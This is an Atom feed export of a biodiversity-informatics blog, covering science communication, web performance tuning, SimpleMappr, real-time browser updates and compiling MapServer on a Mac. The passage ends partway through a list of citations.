<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5846783121665026448</id><updated>2012-01-26T00:41:03.821-07:00</updated><category term='citizen science'/><category term='humour'/><category term='GUIDs'/><category term='mindmap'/><category term='spiders'/><category term='DOI'/><category term='EoL'/><category term='trees'/><category term='GBIF'/><category term='BHL'/><category term='peer-review'/><category term='CrossRef'/><title type='text'>iSpiders</title><subtitle type='html'>Discussions on spider biogeography, systematics and more general comments on biodiversity informatics.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><generator version='7.00' 
uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>68</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3498697830931764411</id><published>2012-01-03T22:58:00.003-07:00</published><updated>2012-01-03T23:43:29.541-07:00</updated><title type='text'>Science is a Product in the Wrong Marketplace</title><content type='html'>Instead of mindlessly watching a movie tonight, I browsed through Google Tech Talks and stumbled upon a spectacularly argued, wonderfully cadenced, and orchestrated Sept 2011 presentation by Kristen Marhaver entitled, "Organizing the world's information by date and author is making Mother Earth Sick".&lt;br /&gt;&lt;br /&gt;&lt;iframe width="560" height="315" src="http://www.youtube.com/embed/lpA79aZ8Bug" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;Her thesis is that science is a product, not a news stream. And, because science is communicated in a self-serving, pay-wall-laden marketplace, its products are paradoxically valueless to outsiders (those who stand to benefit from this knowledge). Kristen argues that the first steps toward cracking into this marketplace could be to expose the inherently social dimension of science by using modern day social gadgetry. Google+, Twitter and star ratings could reside around the periphery of online PDF reprint viewers. Unfortunately, Kristen, this is still the wrong marketplace.&lt;br /&gt;&lt;br /&gt;The one place where the social dimension of science is abundantly obvious is the largely unchallenged scientific conference. There are ways for this energetic, youthful, exploratory dialogue to spill out onto the distant screens of those who could benefit. YouTube, Twitter, Google+ could all be used religiously at conferences because for the most part, papers delivered are free from the publisher's grasp. 
Google Tech Talks and TED talks are spectacularly popular for very good reason. The medium is accessible. Plus, there is ample opportunity to make conferences more accessible and engaging to registrants themselves. How many times have you heard someone deliver a paper who feels the need to introduce his/her co-authors who could not be present or to shamelessly advertise the upcoming paper/poster presentations of their graduate students? The moment someone walks up to the podium, I want all that pushed onto my iPad along with links to their reprints. I'd rather they just get on with it. If their presentation were recorded and later put on YouTube, I'd want the same experience. Sure, links to their reprints would likely throw me up against a brick pay-wall, but I'd already know and appreciate the context.&lt;br /&gt;&lt;br /&gt;To take this even further, why not really expose the scientific conference by advertising the downtime? On how many occasions have you gone to a conference, only to share a beer or two in the evening(s) WITH THE COLLEAGUES YOU ALREADY WORK WITH!? Instead, I want a post-conference un-drink. That is, I'd like to advertise my desire to have a drink by posting what I'd like to talk about and then blast the venue into the Twittersphere for members of the public to join me if they felt so inclined. 
If it's a bust, I'll swallow my pride and go join another one...and I'll bring copies of my reprints.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3498697830931764411?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3498697830931764411/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3498697830931764411' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3498697830931764411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3498697830931764411'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2012/01/science-is-product-in-wrong-marketplace.html' title='Science is a Product in the Wrong Marketplace'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/lpA79aZ8Bug/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8600932512102490984</id><published>2011-11-14T10:05:00.003-07:00</published><updated>2011-11-14T10:09:33.105-07:00</updated><title type='text'>Realtime Web</title><content type='html'>I started work on a whimsical presentation I will soon give to the Biodiversity Informatics Group at the Marine Biological Laboratory about the &lt;a href="http://en.wikipedia.org/wiki/Real-time_web"&gt;Realtime Web&lt;/a&gt; and came up with 
the following kooky slide. Felt the urge to share.&lt;br /&gt;&lt;img style="width: 320px; height: 240px;" src="http://3.bp.blogspot.com/-sJxsR29HVyU/TsFK0sxhQAI/AAAAAAAAAMY/sCT4Gp20_-M/s320/Slide5.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5674899274696048642" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8600932512102490984?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8600932512102490984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8600932512102490984' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8600932512102490984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8600932512102490984'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2011/11/realtime-web.html' title='Realtime Web'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-sJxsR29HVyU/TsFK0sxhQAI/AAAAAAAAAMY/sCT4Gp20_-M/s72-c/Slide5.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7371039119466633739</id><published>2011-11-13T13:19:00.006-07:00</published><updated>2011-11-13T16:34:21.761-07:00</updated><title type='text'>Amazing Web Site Optimizations: Priceless</title><content type='html'>Quite literally, priceless. 
As in costs nothing.&lt;br /&gt;&lt;br /&gt;I was obsessed with web site optimization these past few weeks, trying to trim off every bit of fat from page render times. As we all know, if a page takes longer than approx. 3-4 seconds to render, then you can &lt;a href="http://www.getelastic.com/performance/"&gt;expect to lose your audience&lt;/a&gt;. Even though expectations for speed vary with the end-user's geographic location, a website should be as fast for a user in Beijing as it is for a user in California. As might be expected, server hardware typically isn't the bottleneck. Another way of looking at this is to recognize that remarkable boosts in performance can be had on crap hardware. So, this post presents the tools I used to measure web site performance and describes the simple techniques I employed to trim the excess fat.&lt;br /&gt;&lt;br /&gt;My drug of choice to measure the effect of every little (or major) tweak has been &lt;a href="http://www.webpagetest.org/"&gt;WebPagetest&lt;/a&gt;, a truly invaluable service because I can quickly see where in the world and why my web page suffered. Knowing that it took 'x' ms to download and render a JavaScript file or 'y' ms to do the same for a css file meant I could see with precision what a bit of js or css cleansing does to a user's perception of my web site. I also used &lt;a href="http://getfirebug.com/"&gt;Firebug&lt;/a&gt; and Yahoo's &lt;a href="http://developer.yahoo.com/yslow/"&gt;YSlow&lt;/a&gt;, both as Firefox plug-ins. Google Chrome also has a &lt;a href="http://code.google.com/speed/page-speed/docs/rules_intro.html"&gt;Page Speed&lt;/a&gt; extension that I used to produce a few optimized versions of graphics files.&lt;br /&gt;&lt;br /&gt;Some tricks I employed to great effect, in order from most to least important:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Make css sprites. 
The easiest tool I found was the &lt;a href="http://spritegen.website-performance.org/"&gt;CSS Sprite Generator&lt;/a&gt;. Upload a zipped folder of icons and it spits out a download and a css file. Could it be any easier? Making a css sprite eliminates a ton of unnecessary HTTP requests and is by far the most important technique to slash load times.&lt;/li&gt;&lt;li&gt;Minify JavaScript and css. For the longest time, I was using the facile &lt;a href="http://www.minifyjavascript.com/"&gt;JavaScript Compressor&lt;/a&gt;, but the cut/paste workflow became too much of a pain. So, I elected to use some server-side code to do the same: &lt;a href="https://github.com/rgrove/jsmin-php/"&gt;jsmin-php&lt;/a&gt; and &lt;a href="http://code.google.com/p/cssmin/"&gt;CssMin&lt;/a&gt;. When my page is first rendered, the composite js and css files are made in memory then saved to disk. Upon re-rendering (by anyone), the minified versions are served. &lt;a href="https://github.com/dshorthouse/SimpleMappr/blob/master/lib/mapprservice.header.class.php"&gt;Here's the PHP class&lt;/a&gt; I wrote that does this for me. Whenever I deploy new code, the cached files are deleted then recreated with a new MD5 hash as file titles.&lt;/li&gt;&lt;li&gt;Properly configured web server. This is especially important for a user's second, third+ visit. You'd be crazy not to take advantage of the fact that a client's browser can cache! 
I use Apache and here's what I have:&lt;br /&gt;&lt;br /&gt;&amp;lt;Directory "/var/www/SimpleMappr"&amp;gt;&lt;br /&gt;Options -Indexes +FollowSymLinks +ExecCGI&lt;br /&gt;AllowOverride None&lt;br /&gt;Order allow,deny&lt;br /&gt;Allow from all&lt;br /&gt;DirectoryIndex index.php&lt;br /&gt;FileETag MTime Size&lt;br /&gt;&amp;lt;IfModule mod_expires.c&amp;gt;&lt;br /&gt;&amp;lt;FilesMatch "\.(jpe?g|png|gif|js|css|ico|php|htm|html)$"&amp;gt;&lt;br /&gt; ExpiresActive On&lt;br /&gt; ExpiresDefault "access plus 1 week"&lt;br /&gt;&amp;lt;/FilesMatch&amp;gt;&lt;br /&gt;&amp;lt;/IfModule&amp;gt;&lt;br /&gt;&amp;lt;/Directory&amp;gt;&lt;br /&gt;&lt;br /&gt;Notice that I use the mod_expires module. I also set the FileETag to MTime Size, though this was marginally effective.&lt;/li&gt;&lt;li&gt;Include ALL JavaScript files just before the closing body tag. This boosts the potential for parallelism and the page can begin rendering before all the JavaScript has finished downloading.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Serve JavaScript libraries from a Content Delivery Network (CDN). I use jQuery and serve it from &lt;a href="http://docs.jquery.com/Downloading_jQuery#CDN_Hosted_jQuery"&gt;Google&lt;/a&gt;. Be wary that on average, it is best to ONLY have 4 external sites from which content will be drawn. This includes static content servers that might be a subdomain associated with your web site. Beyond 3 external domains or subdomains, DNS look-up times outweigh the benefit of parallelism, especially for aged versions of Internet Explorer. Modern browsers are capable of more simultaneous connections, but we cannot (yet) ignore IE. I once served jQueryUI via the Google CDN, but because this was yet another HTTP request, it was slower than had I served it from my own server. So, I now pull jQuery from the Google CDN and I include jQueryUI with my own JavaScript in a single minified file from my server.&lt;/li&gt;&lt;li&gt;Use a Content Delivery Network. 
I use &lt;a href="https://www.cloudflare.com/"&gt;CloudFlare&lt;/a&gt; because it's free, was configured in 5 minutes and within a day, there was noticeable global improvement in web page speed as measured via WebPagetest. Because I regularly push new code, I use the CloudFlare API to flush their caches whenever I deploy. However, this is largely unnecessary because they do not cache HTML and as mentioned earlier, I make an MD5 hash as my js and css file titles.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;So there you have it, I was able to trim 4-6 seconds from a very JavaScript-heavy web site. And, web page re-render speed is typically sub-second from most parts of the world. Because much of the content is proxied through CloudFlare, my little server barely breaks a sweat.&lt;br /&gt;&lt;br /&gt;Did I mention that none of the above cost me anything?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7371039119466633739?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7371039119466633739/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7371039119466633739' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7371039119466633739'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7371039119466633739'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2011/11/amazing-web-site-optimizations.html' title='Amazing Web Site Optimizations: Priceless'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1342287357292421174</id><published>2011-06-26T16:59:00.005-06:00</published><updated>2011-06-26T17:18:44.013-06:00</updated><title type='text'>SimpleMappr Embedded</title><content type='html'>I never had high hopes for &lt;a href="http://www.simplemappr.net/"&gt;SimpleMappr&lt;/a&gt;. There are plenty of desktop applications to produce publication-quality point maps. But it turns out, users find these hard to use or too rich for their pocketbooks. As a result, my little toy and its API are getting a fair amount of use. I find this greatly encouraging so I occasionally clean up the code and add a few logical, unobtrusive options.&lt;br /&gt;&lt;br /&gt;A number of users appear to want outputs for copy-paste on web pages and not copy-paste into manuscripts, so I just wrote an extension to permit embedding.&lt;br /&gt;&lt;br /&gt;Here's one such example using the URL&lt;br /&gt;&lt;a href="http://www.simplemappr.net/?map=643&amp;amp;width=500&amp;amp;height=250"&gt;http://www.simplemappr.net/?map=643&amp;amp;width=500&amp;amp;height=250&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.simplemappr.net/?map=643&amp;amp;width=500&amp;amp;height=250" /&gt;&lt;br /&gt;&lt;br /&gt;Happy mapping...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1342287357292421174?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1342287357292421174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1342287357292421174' title='0 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1342287357292421174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1342287357292421174'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2011/06/simplemappr-embedded.html' title='SimpleMappr Embedded'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1874208591636318681</id><published>2010-11-15T08:04:00.002-07:00</published><updated>2010-11-15T08:27:42.583-07:00</updated><title type='text'>Lightweight, Cross-platform, Real-time Browser-Browser Communications</title><content type='html'>During a monthly meeting to discuss cutting edge technologies here at the Biodiversity Informatics Group at the Marine Biological Laboratory, I demonstrated a technique to update distributed browsers in the face of collaborative classification (i.e. tree) editing. In essence, if there are 2+ people asynchronously (i.e. via AJAX calls) updating content on a web page, there is potential for everyone to get horribly out of sync with one another. Imagine for example a chat window on a web page that does not update on everyone's web page in real time....wouldn't make for a particularly pleasant or useful experience for anyone. The same lousy experience was true in the LifeDesks tree editor when 2+ people were simultaneously updating the same classification. Person A might delete or move a node and person B, C, D, ... etc. 
are none the wiser and might later perform an action on that node (or its children) whereas the database no longer reflects what they see in their browser screen.&lt;br /&gt;&lt;br /&gt;&lt;object width="480" height="385"&gt;&lt;param name="movie" value="http://www.youtube.com/v/-QHSvYrP0O4?fs=1&amp;amp;hl=en_US"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/-QHSvYrP0O4?fs=1&amp;amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;To work around the possibility that everyone editing can get horribly out of sync with one another, I implemented a polling mechanism to grab recent adjustments to data every 5 seconds. If you happen to be looking at a portion of the tree that someone else has just deleted or moved elsewhere in the tree, relevant nodes within the tree will now automagically refresh to reflect actions that someone else just performed...nodes will flash red then disappear, nodes will flash green then appear, etc. There is also a scrolling activity monitor at the bottom of the screen. To be sure, this isn't a particularly robust mechanism because there is constant polling. Enter web sockets...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.linkedin.com/in/ryanschenk"&gt;Ryan Schenk&lt;/a&gt;, who attended this informal demonstration, alerted me to &lt;a href="http://socket.io/"&gt;Socket.IO&lt;/a&gt;. I knew of it, but never paid much attention. However, after having poked around a little bit with the examples provided, I am convinced this is the way I should have designed real-time classification tree updates in the face of 2+ simultaneous user actions. The lightweight technique will prove useful for any client-client communications (e.g. real time chat). 
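&lt;br /&gt;&lt;br /&gt;To make the contrast between polling and push concrete, here is a minimal sketch in Python. It is neither the LifeDesks code nor Socket.IO's API: the names EditLog, poll_all, Hub and demo are all hypothetical, and the "database" is just an in-memory list that counts how often it is read.&lt;pre&gt;

```python
# Hypothetical sketch: EditLog, poll_all, Hub and demo are illustrative names only.


class EditLog:
    """Stands in for the database of tree edits and counts how often it is read."""

    def __init__(self):
        self.edits = []
        self.reads = 0

    def append(self, edit):
        self.edits.append(edit)

    def since(self, index):
        # Every call models one database query made on behalf of one client.
        self.reads += 1
        return self.edits[index:]


def poll_all(log, cursors):
    """One polling tick: every client asks the log for edits it has not yet seen."""
    delivered = {}
    for client, seen in cursors.items():
        fresh = log.since(seen)
        cursors[client] = seen + len(fresh)
        delivered[client] = fresh
    return delivered


class Hub:
    """Push model: an edit is handed to every other subscriber as soon as it happens."""

    def __init__(self):
        self.subscribers = {}

    def subscribe(self, client, callback):
        self.subscribers[client] = callback

    def publish(self, sender, edit):
        for client, callback in self.subscribers.items():
            if client != sender:
                callback(edit)


def demo():
    # Polling: three clients, four ticks, one edit made just before the second tick.
    log = EditLog()
    cursors = {"A": 0, "B": 0, "C": 0}
    for tick in range(4):
        if tick == 1:
            log.append("move node 42")
        poll_all(log, cursors)
    polling_reads = log.reads

    # Push: the same edit travels from A to B and C through the hub.
    inbox = {"B": [], "C": []}
    hub = Hub()
    hub.subscribe("A", lambda edit: None)
    hub.subscribe("B", inbox["B"].append)
    hub.subscribe("C", inbox["C"].append)
    hub.publish("A", "move node 42")
    return polling_reads, inbox
```

&lt;/pre&gt;In this toy run, three polling clients read the log 12 times over four ticks to pick up a single edit, whereas the hub hands the same edit to B and C without either of them re-reading anything.&lt;br /&gt;&lt;br /&gt;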
Plus, it has the excellent benefit of cross-browser, cross-platform capabilities with very little server strain. A database need only be hit once when person A exerts an action and the data propagates to all other users. Very cool.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1874208591636318681?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1874208591636318681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1874208591636318681' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1874208591636318681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1874208591636318681'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/11/lightweight-cross-platform-real-time.html' title='Lightweight, Cross-platform, Real-time Browser-Browser Communications'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2614978647949429957</id><published>2010-11-12T13:13:00.015-07:00</published><updated>2010-11-12T13:47:20.366-07:00</updated><title type='text'>MapServer, MapScript, MacPorts</title><content type='html'>&lt;div style="float: left; height: 90px;"&gt;&lt;img style="width: 183px; height: 70px; vertical-align: middle;" 
src="http://2.bp.blogspot.com/_VYUFlXOCOxE/TN2jQVpVxlI/AAAAAAAAAKY/vsldFj8MyXU/s320/macports-logo-top.png" alt="" border="0" /&gt;&lt;/div&gt;&lt;div style="float: right; height: 90px;"&gt;&lt;img style="width: 320px; height: 85px; vertical-align: middle;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/TN2jJ69ID8I/AAAAAAAAAKQ/gfRgOV9gj8s/s320/banner.png" alt="" border="0" /&gt;&lt;/div&gt;&lt;div style="clear: both;"&gt;&lt;/div&gt;&lt;br /&gt;For anyone wishing to get into &lt;a href="http://mapserver.org/"&gt;MapServer&lt;/a&gt; and serve shapefiles via PHP and also use a Mac with &lt;a href="http://www.macports.org/"&gt;MacPorts&lt;/a&gt; for local development, here is how to compile. I discovered the hard way that the &lt;a href="http://trac.macports.org/browser/trunk/dports/gis/mapserver/Portfile"&gt;MacPorts port&lt;/a&gt; for MapServer is horribly dated and DOES NOT include PHP-MapScript. Compile instructions below assume you already have the php5 MacPort.&lt;br /&gt;&lt;br /&gt;Install some dependencies if you haven't already got them:&lt;br /&gt;&lt;br /&gt;sudo port install php5-gd&lt;br /&gt;sudo port install xpm&lt;br /&gt;sudo port install proj&lt;br /&gt;sudo port install geos&lt;br /&gt;sudo port install gdal&lt;br /&gt;&lt;br /&gt;1. Download latest MapServer tarball, http://mapserver.org/download.html (e.g. at time of writing &lt;a href="http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz"&gt;http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz&lt;/a&gt;)&lt;br /&gt;2. Extract and cd into folder&lt;br /&gt;3. 
Execute from command line:&lt;br /&gt;&lt;br /&gt;$ ./configure \&lt;br /&gt;--prefix=/usr \&lt;br /&gt;--with-agg \&lt;br /&gt;--with-proj=/opt/local \&lt;br /&gt;--with-geos=/opt/local/bin/geos-config \&lt;br /&gt;--with-gdal=/opt/local/bin/gdal-config \&lt;br /&gt;--with-threads \&lt;br /&gt;--with-ogr \&lt;br /&gt;--without-tiff \&lt;br /&gt;--with-freetype=/opt/local \&lt;br /&gt;--with-xpm=/opt/local \&lt;br /&gt;--with-png=/opt/local \&lt;br /&gt;--with-jpeg=/opt/local \&lt;br /&gt;--with-gd=/opt/local \&lt;br /&gt;--with-wfs \&lt;br /&gt;--with-wcs \&lt;br /&gt;--with-wmsclient \&lt;br /&gt;--with-wfsclient \&lt;br /&gt;--with-sos \&lt;br /&gt;--with-fribidi-config \&lt;br /&gt;--with-experimental-png \&lt;br /&gt;--with-php=/opt/local&lt;br /&gt;&lt;br /&gt;4. Execute from command line: $ make&lt;br /&gt;5. Verify that mapserv is working by executing ./mapserv -v&lt;br /&gt;6. Find php_mapscript.so in mapscript/php3 and move it to the PHP extensions directory (usually /opt/local/lib/php/extensions/no-debug-non-zts-20090626/ for MacPorts). You may also need to add extension=php_mapscript.so to your php.ini.&lt;br /&gt;7. Move mapserv into the web server's cgi-bin folder and make it executable if you want to use it directly (optional)&lt;br /&gt;&lt;br /&gt;If MacPorts's &lt;a href="http://www.gdal.org/"&gt;GDAL&lt;/a&gt; were similarly updated to v. 1.7.3, you could use GeoRSS data just as you would use shapefiles. But, alas, at the time of writing, the version in MacPorts is v. 1.6.2.&lt;br /&gt;&lt;br /&gt;While we're on the mapping kick, here is an excellent source of shapefiles: &lt;a href="http://www.naturalearthdata.com/"&gt;http://www.naturalearthdata.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;...and a bit of &lt;a href="http://dev.numerex.com/code-snippets/article/consuming-georss-feeds-with-php/"&gt;PHP code to consume GeoRSS&lt;/a&gt; using the Magpie RSS library. 
The author uses some deprecated PHP functions in places, but it is nonetheless quite useful.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2614978647949429957?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2614978647949429957/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2614978647949429957' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2614978647949429957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2614978647949429957'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/11/mapserver-mapscript-macports.html' title='MapServer, MapScript, MacPorts'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/TN2jQVpVxlI/AAAAAAAAAKY/vsldFj8MyXU/s72-c/macports-logo-top.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2924585229000122690</id><published>2010-08-21T11:54:00.016-06:00</published><updated>2012-01-18T14:04:54.994-07:00</updated><title type='text'>Reference Parser Revived</title><content type='html'>&lt;style type="text/css"&gt;.refparser-icon{margin-left:3px;vertical-align:middle;}&lt;/style&gt;&lt;br /&gt;&lt;script type="text/javascript" 
src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://refparser.shorthouse.net/assets/jquery.refparser.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;$(function(){var options = {target  : '_blank'};$(".biblio-entry").refParser(options);});&lt;/script&gt;&lt;br /&gt;Many moons ago, I developed a tool that does real time discovery of scientific references using a combination of the aged (though still very useful) &lt;a href="http://paracite.eprints.org/developers/"&gt;ParaTools&lt;/a&gt; and &lt;a href="http://www.crossref.org/"&gt;CrossRef&lt;/a&gt;'s OpenURL service. With the demise of my server, this bit of code was lost. &lt;span style="text-decoration: line-through;"&gt;I just revived the code and functionality and provide it here for anyone else to take it and refine it&lt;/span&gt; UPDATE: parsing is now executed with a Ruby gem: &lt;a href="http://refparser.shorthouse.net/"&gt;http://refparser.shorthouse.net/&lt;/a&gt;. This location is not likely to persist so get it while you can. To get a sense of what it does, here are some verbatim references. Click the magnifying glass after each reference to experience the magic. Cross-domain AJAX requests are circumvented by using jQuery's clever JSONP handling.&lt;p class="biblio-entry"&gt;Bell, C. D., &amp;amp; Patterson R. W. (2000).  Molecular phylogeny and biogeography of &lt;em&gt;Linanthus&lt;/em&gt; (Polemoniaceae).  &lt;em&gt;American Journal of Botany&lt;/em&gt;. &lt;strong&gt;87&lt;/strong&gt;, 1857-1870.&lt;/p&gt;&lt;p class="biblio-entry"&gt;Epling, C., &amp;amp; Dobzhansky T. (1942).  Genetics of natural populations. VI. Microgeographic races in &lt;em&gt;Linanthus parryae&lt;/em&gt;. &lt;em&gt;Genetics&lt;/em&gt;. &lt;strong&gt;27&lt;/strong&gt;, 317-332.&lt;/p&gt;&lt;p class="biblio-entry"&gt;Epling, C., Lewis H., &amp;amp; Ball F. M. (1960).  
